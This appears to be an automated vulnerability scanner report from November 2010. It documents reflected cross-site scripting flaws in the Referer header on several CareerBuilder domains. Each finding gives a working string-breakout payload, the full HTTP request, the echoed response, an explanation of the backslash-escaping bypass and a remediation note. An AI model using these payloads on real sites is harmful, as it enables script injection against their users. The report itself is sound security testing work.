HTTP/1.1 200 OK Cache-Control: private Content-Length: 178283 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=d1473c69403a49ec8ebf9e0ea519a1f2-343071265-w7-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65003EC1B87CBB6BA70922E8656A0D1888FB8AC077BB762524C6F01FCDC17C1566B91C57542DB6721A1; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:25 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:25 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR7 Date: Sun, 14 Nov 2010 22:34:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 894b3\\';alert(1)//7ba9f980d81'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50314\'%3balert(1)//8bb9d4c20a0 was submitted in the Referer HTTP header. This input was echoed as 50314\\';alert(1)//8bb9d4c20a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /rt.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh045 HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=50314\'%3balert(1)//8bb9d4c20a0
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182773 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=ed904496b065448f8628756e1866a37f-343071293-w6-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6506E1BE139EC4AF2E0A61386AA8E839B797A307B76F70FE5FB45A9E55A0222E60B8DB9FFE65A24E159; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:34:52 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:49:53 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR6 Date: Sun, 14 Nov 2010 22:34:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 50314\\';alert(1)//8bb9d4c20a0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6eeff\'%3balert(1)//b625734020e was submitted in the Referer HTTP header. This input was echoed as 6eeff\\';alert(1)//b625734020e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /rt.ic/Florida_Miami/ HTTP/1.1 Host: retail.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6eeff\'%3balert(1)//b625734020e
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 182862 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=dc792b97acfe4885a90b55d0f9c81eae-343071152-w0-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650A06ECD1A2FFEDF6B55BA2F2D7B10B8B764652DC3C40E1672059F9833873516344A0AB7257C561BD4; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:31 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:32 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR10 Date: Sun, 14 Nov 2010 22:32:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6eeff\\';alert(1)//b625734020e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a1b3\'%3balert(1)//35ad406e06b was submitted in the Referer HTTP header. This input was echoed as 5a1b3\\';alert(1)//35ad406e06b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /sm.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh046 HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5a1b3\'%3balert(1)//35ad406e06b
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 185161 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=969fc5e9d56b46f2ab1affc80cf3c931-343071308-wo-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650949AF606F12902D971680E2256E03A6D1DC28E63FEEF26AA0BF55E551F7266D494F439889C4F5AF9; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:35:08 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:50:08 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR25 Date: Sun, 14 Nov 2010 22:35:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 5a1b3\\';alert(1)//35ad406e06b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27a8f\'%3balert(1)//6e670ded9a4 was submitted in the Referer HTTP header. This input was echoed as 27a8f\\';alert(1)//6e670ded9a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /sm.ic/Florida_Miami/ HTTP/1.1 Host: sales-marketing.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=27a8f\'%3balert(1)//6e670ded9a4
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 185266 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/ Set-Cookie: CB%5FSID=e65ed342f27d4238af6d8621f0503b2c-343071157-wd-6; domain=.careerbuilder.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65061E70695D1D1345551E477D9E9B188738F617418ADB3368BC5C74550A70AA3BF5FB06EFA92CB48E3; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:37 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:37 GMT; path=/ X-Powered-By: ASP.NET X-PBY: BEAR14 Date: Sun, 14 Nov 2010 22:32:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 27a8f\\';alert(1)//6e670ded9a4'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7decc\'%3balert(1)//b5c1d35e6b6 was submitted in the Referer HTTP header. This input was echoed as 7decc\\';alert(1)//b5c1d35e6b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.be Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=7decc\'%3balert(1)//b5c1d35e6b6
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41396 Content-Type: text/html; charset=UTF-8 Content-Language: nl-BE Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=076fae62ecd844ab83cbd15796e732e6-343074658-RT-4; domain=.careerbuilder.be; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650D6BAB25334AC648C946D2BECF3CECF422BDDE4F98E7593E9FB2A73D1D7A21867DD45D8900D29A64F; domain=.careerbuilder.be; expires=Mon, 14-Nov-2011 23:30:58 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL29 Date: Sun, 14 Nov 2010 23:30:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="nl-BE" lang="nl-BE"> <head><title> Belgis ...[SNIP]... rbuilder.be'; s_cb.channel='JS_Home'; s_cb.eVar8='JS_Home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7decc\\';alert(1)//b5c1d35e6b6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a991a\'%3balert(1)//5f33983e9f6 was submitted in the Referer HTTP header. This input was echoed as a991a\\';alert(1)//5f33983e9f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a991a\'%3balert(1)//5f33983e9f6
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52295 Content-Type: text/html; charset=UTF-8 Content-Language: en-GB Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=09b4107f91f64a6bb35b6f2e334f9ec1-343074617-R2-4; domain=.careerbuilder.ca; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6509424A7CD9CD907F95A20CC91B66835FF3627FFD79F20E005CD7BFE98FE7B12DBD69F5E53AB6E8F75; domain=.careerbuilder.ca; expires=Mon, 14-Nov-2011 23:30:16 GMT; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.ca; expires=Sun, 14-Nov-2010 23:45:17 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL2 Date: Sun, 14 Nov 2010 23:30:16 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Career ...[SNIP]... s_cb.prop1='CA Home Page'; s_cb.eVar8='JS_Home - CA Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a991a\\';alert(1)//5f33983e9f6'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ddaa2\'%3balert(1)//f383e007944 was submitted in the Referer HTTP header. This input was echoed as ddaa2\\';alert(1)//f383e007944 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=ddaa2\'%3balert(1)//f383e007944
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56945 Content-Type: text/html; charset=UTF-8 Content-Language: de Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=211289f2c8a647beb5925d7b23171cfe-343074637-wg-6; domain=.careerbuilder.ch; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65020CFC40F9477B2A12DE11369EB093F6A65742E17DA3B7750224503A170F1D2F1699D9D43299CC627; domain=.careerbuilder.ch; expires=Mon, 14-Nov-2011 23:30:36 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR17 Date: Sun, 14 Nov 2010 23:30:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="de" lang="de"> <head><title> Jobs, Stelle ...[SNIP]... w.careerbuilder.ch'; s_cb.eVar8='www.careerbuilder.ch/CH/Default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ddaa2\\';alert(1)//f383e007944'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb19e\'%3balert(1)//bcd2ccde6ec was submitted in the Referer HTTP header. This input was echoed as cb19e\\';alert(1)//bcd2ccde6ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.co.in Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cb19e\'%3balert(1)//bcd2ccde6ec
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48960 Content-Type: text/html; charset=UTF-8 Content-Language: en-GB Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=6b9587ed92dc413eaa4742ff5e63d607-343074622-RO-4; domain=.careerbuilder.co.in; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650BEE444AA1C62206A582106BF6EDFFAA27F13B4C4277B0E59C1A5B416853CAAD126244A1C796639F5; domain=.careerbuilder.co.in; expires=Mon, 14-Nov-2011 23:30:21 GMT; path=/; HttpOnly Set-Cookie: CB%5FSID=a22a4459be5947d98004b3d1664aa504-343074622-RO-4; domain=.careerbuilder.co.in; path=/; HttpOnly Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 23:45:21 GMT; path=/ X-Powered-By: ASP.NET X-PBY: REBEL24 Date: Sun, 14 Nov 2010 23:30:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-GB" lang="en-GB"> <head><title> Jobs, ...[SNIP]... s_cb.prop1='IN Home Page'; s_cb.eVar8='JS_Home - IN Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cb19e\\';alert(1)//bcd2ccde6ec'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bea49\'%3balert(1)//10979b37ff was submitted in the Referer HTTP header. This input was echoed as bea49\\';alert(1)//10979b37ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1 Host: www.careerbuilder.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bea49\'%3balert(1)//10979b37ff
Response (redirected)
